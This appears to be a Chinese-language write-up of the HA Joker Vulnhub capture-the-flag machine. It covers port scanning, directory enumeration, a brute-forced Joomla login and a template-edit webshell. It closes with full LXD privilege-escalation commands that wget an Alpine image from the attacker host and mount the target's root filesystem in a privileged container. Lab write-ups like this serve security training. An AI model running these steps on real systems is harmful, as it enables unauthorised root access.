HA Joker Vulnhub Walkthrough
下载地址:
https://www.vulnhub.com/entry/ha-joker,379/
SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。主机扫描:
╰─ nmap -p- -sV -oA scan 10.10.202.132
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-23 11:53 CST
Nmap scan report for 10.10.202.132
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8080/tcp open http Apache httpd 2.4.29
MAC Address: 00:0C:29:6E:95:65 (VMware)
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://10.10.202.132/
目录枚举:
╰─ python3 dirsearch.py -u http://10.10.202.132/ -e .txt,php,json,html
通过以上可获得网站跟路径
使用dirb 工具继续探测下目录
╰─ dirb http://10.10.202.132/ -X .txt,php,json,html
+ http://10.10.202.132/secret.txt (CODE:200|SIZE:320)
http://10.10.202.132/secret.txt
Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"
http://10.10.202.132:8080
joker/123456
密码错误,这里使用burp进行爆破
登录后台是joomla 的CMS
通过模板编辑获取shell
编辑index.php文件获取webshell
本地监听1234端口,访问主页面获取shell
提权操作
这里使用LXD 来提升权限
本地先编译好alpine,然后再使用
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
靶机操作
wget http://10.10.202.133/alpine-v3.10-x86_64-20190907_1836.tar.gz
lxc image import ./alpine-v3.10-x86_64-20190907_1836.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
OVER!
